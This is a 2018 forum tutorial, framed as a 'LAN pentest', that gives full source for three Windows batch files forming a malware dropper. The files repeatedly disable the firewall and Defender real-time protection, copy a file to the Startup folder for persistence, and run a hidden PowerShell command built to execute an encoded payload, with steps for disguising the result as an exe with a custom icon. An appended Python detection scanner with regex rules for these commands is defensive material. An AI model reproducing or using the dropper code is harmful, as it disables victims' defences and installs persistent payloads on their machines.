Learn About Computers

Teaching about Computers


    23. Lan Pentest Preparing Payload With Windows 7


    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    23. Lan Pentest Preparing Payload With Windows 7

    Post by Aof on Sun May 27, 2018 10:46 pm


    23. Lan Pentest Preparing Payload With Windows 7
    ----
    Lan & Wlan Pentests, A Closer look at preparing the Payloads, 3 Bat Files Commands are explained within the video.
    af.bat Contents & Rem comments Explanation of Commands.
    =*=

    Code:
    @echo off
    Rem Turns off Echo
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    Rem starts command prompt in minimized mode,
    Rem this command probably isn't necessary,
    Rem since we will make the entire thing invisible later
    Rem but why not?
    taskkill /im f1.exe /f
    Rem kill process f1.exe forcefully.
    timeout /t 01 > nul
    Rem waits 1 second, without printing anything with nul.
    start "" "%appdata%\zombie.png"
    Rem starts a program or file, in this case a picture.
    netsh advfirewall set allprofiles state off 2> nul
    Rem sets Windows 10 firewall to off if this
    Rem program is run in Administrator Mode.
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    Rem Disable Windows Defender Realtime Protection
    timeout /t 10 > nul
    Rem waits 10 seconds, repeat.
    Rem If the program is not run as administrator
    Rem this portion will just print an error, but
    Rem since it's set to nul, it shouldn't print anything.
    Rem Besides, we will make this entire thing invisible
    Rem so nothing seems to matter, it's just extra notes.
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    Rem After approximately 1 minute and 40 seconds of
    Rem Repeatedly disabling protection
    "%appdata%\f1.exe" 2> nul
    Rem Starts "f1.exe" silently from within this actual
    Rem Command Prompt Window.
    Rem there is no start command before it,
    Rem so this program is done running from this point
    Rem and it should not be able to run any commands below
    Rem this point.
    exit
    Rem just in case it did run anything else,
    Rem it will exit itself.


    f1.bat Contents & Rem comments Explanation of Commands.
    =*=

    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    Rem turns echo off, kills payload's
    Rem process, powershell.exe if it's running.
    timeout /t 02
    Rem waits 2 seconds
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    Rem Moves f.exe to the User's startup's folder.
    :Begin
    Rem Beginning Block
    set t=%date:~4,5%
    Rem Sets the variable "t" to the current date of the pc
    if "%t%"=="03/02" goto :A
    Rem if the date matches 3 month and 2 day goto block A.
    if not "%t%"=="03/02" goto :B
    Rem if doesn't match 3 month and 2 day goto block B.
    timeout /t 02 > nul
    Rem Waits 2 seconds
    :A
    Rem Beginning of Block A.
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    Rem start Payload.
    :B
    Rem Beginning of Block B.
    timeout /t 05
    Rem Waits 5 seconds.
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    Rem starts f.exe
    timeout /t 05
    Rem Waits 5 seconds, program will exit itself after
    Rem Completing all commands.

    f.bat Contents & Rem comments Explanation of Commands.
    =*=

    Code:
    @echo off
    Rem Turns echo off.
    taskkill /im f1.exe /f 2> nul
    Rem kills the process f1.exe forcefully, to nul
    Rem so it doesn't print anything when it kills it.
    taskkill /im powershell.exe /f
    Rem kills powershell.exe forcefully.
    timeout /t 04 > nul
    Rem waits 4 seconds.
    del "%appdata%\f1.exe" /q /s /f 2> nul
    Rem deletes f1.exe which is the payload .exe


    I prefer to use Windows 7 vs. Windows 10 to prepare the Payload.
    1. Search windows for Microsoft Security Essentials (That's my Virus Protector within the video.) Set your real-time protection to Off.
    2. taskkill /im explorer.exe /f & taskkill /im msseces.exe /f & explorer.exe = Open the Command Prompt, enter the following command which will kill your gui explorer, kill Microsoft security essentials process, then restart your gui file explorer.
    3. Plug in your Usb stick with the Payload on it.
    4. I have the 3 .bat files code contents in this forum post, under the "code" sections, find the 3 .bat files I use in the video, then follow the instructions within the video carefully. Below are each of the .bat file contents, and the names I named it within the video.
    5. You will need your own payload, your own icon file, and your own zombie.PNG image in order to use the below files for a Pentest on your own machine.
    6. Keep in mind for the exe files that I created, the 1 exe that runs for administrator is for Windows 10, and the one that runs without administrator privileges is for Windows 7.

    af.bat file contents: This file will be the first & main file, that will eventually contain all of the other exe files that we create using bat to exe. It will also be in charge of disabling protection, or bypassing it in Windows 7 64-bit systems; this will not work, however, for 32-bit Windows 7 systems.
    =*=

    Code:
    @echo off
    if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
    taskkill /im f1.exe /f
    timeout /t 01 > nul
    start "" "%appdata%\zombie.png"
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    netsh advfirewall set allprofiles state off 2> nul
    powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true" 2> nul
    timeout /t 10 > nul
    "%appdata%\f1.exe" 2> nul
    exit


    f1.bat file contents: This Bat file is the one that should actually contain your Payload, in the 'INSERT-HERE' section under the :A BLOCK of text.
    =*=

    Code:
    @echo off
    taskkill /im powershell.exe /f 2> nul
    timeout /t 02
    move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
    :Begin
    set t=%date:~4,5%
    if "%t%"=="03/02" goto :A
    if not "%t%"=="03/02" goto :B
    timeout /t 02 > nul
    :A
    powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'INSERT-HERE'" > nul
    exit
    :B
    timeout /t 05
    start "" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe" 2> nul
    timeout /t 05


    f.bat file contents: This bat file tells Windows to remove the f1.exe file whenever the user restarts the computer.
    =*=

    Code:
    @echo off
    taskkill /im f1.exe /f 2> nul
    taskkill /im powershell.exe /f
    timeout /t 04 > nul
    del "%appdata%\f1.exe" /q /s /f 2> nul

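Added detection example, not part of the post above: a small Python scanner that applies the rules a defender would write for exactly these batch-file command lines (firewall off, Defender realtime off, killing the AV process, Startup-folder persistence, hidden PowerShell that splices its own flag together) to constructed process-creation log lines. The "Image | CommandLine" log format, the sample lines, and the extra Defender process names (MsMpEng.exe, NisSrv.exe) are assumptions of this example, not from the post.

```python
import re

# Constructed sample process-creation events ("Image | CommandLine"), modelled
# on the command lines in the batch files above; the last line is benign noise.
SAMPLE_LOG = r'''
netsh.exe | netsh advfirewall set allprofiles state off
powershell.exe | powershell.exe /c "Set-MpPreference -DisableRealtimeMonitoring $true"
taskkill.exe | taskkill /im msseces.exe /f
cmd.exe | move "%appdata%\f.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\f.exe"
powershell.exe | powershell -w 1 -C "sv x -;sv ZO ec;sv h ((gv x).value.toString()+(gv ZO).value.toString());powershell (gv h).value.toString() 'BASE64-PLACEHOLDER'"
notepad.exe | notepad.exe C:\Users\u\notes.txt
'''.strip().splitlines()

# (rule name, regex over the command line, MITRE ATT&CK technique id). msseces.exe is
# the Security Essentials process the post kills; MsMpEng/NisSrv are Defender's (assumed).
RULES = [
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I), "T1562.004"),
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$?true", re.I), "T1562.001"),
    ("security_process_killed",
     re.compile(r"taskkill\b.*/im\s+(msseces|msmpeng|nissrv)\.exe", re.I), "T1562.001"),
    ("startup_folder_persistence",
     re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I), "T1547.001"),
    # hidden window plus string-splicing that assembles a flag ("-" + "ec") at runtime
    ("hidden_powershell_spliced_flag",
     re.compile(r"powershell.*(-w\s+1|-windowstyle\s+hidden).*toString\(\)\s*\+", re.I), "T1059.001"),
]

def classify(cmdline):
    """Names of every rule whose regex matches this command line."""
    return [name for name, rx, _ in RULES if rx.search(cmdline)]

def scan(lines):
    """Map each matched rule name to the command lines that triggered it."""
    hits = {}
    for line in lines:
        cmdline = line.partition(" | ")[2].strip()   # drop the Image field
        for name in classify(cmdline):
            hits.setdefault(name, []).append(cmdline)
    return hits

def techniques_seen(lines):
    """Sorted, de-duplicated ATT&CK ids for everything scan() matched."""
    matched = scan(lines)
    return sorted({tid for name, _, tid in RULES if name in matched})

def looks_like_this_dropper(lines):
    """Two distinct T1562 defense-evasion techniques plus Startup persistence: the af.bat -> f1.bat chain."""
    ids = techniques_seen(lines)
    return sum(t.startswith("T1562") for t in ids) >= 2 and "T1547.001" in ids
```

The individual rules are noisy on their own (an administrator legitimately runs netsh or Set-MpPreference); the combination check is what separates this dropper's sequence from routine administration.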



    Aof
    Admin

    Posts : 95
    Join date : 2018-03-24

    Re: 23. Lan Pentest Preparing Payload With Windows 7

    Post by Aof on Sun May 27, 2018 11:02 pm

    http://www.majorgeeks.com/files/details/bat_to_exe_converter.html
    Bat to Exe Converter Download Link

    mediafire.com/file/lljfw7si9crtwrb/bjim.zip
    Big J Icon Maker Download Link; copy & paste it in your browser. Also, it should be noted that any icon maker should work; you don't have to use this one.
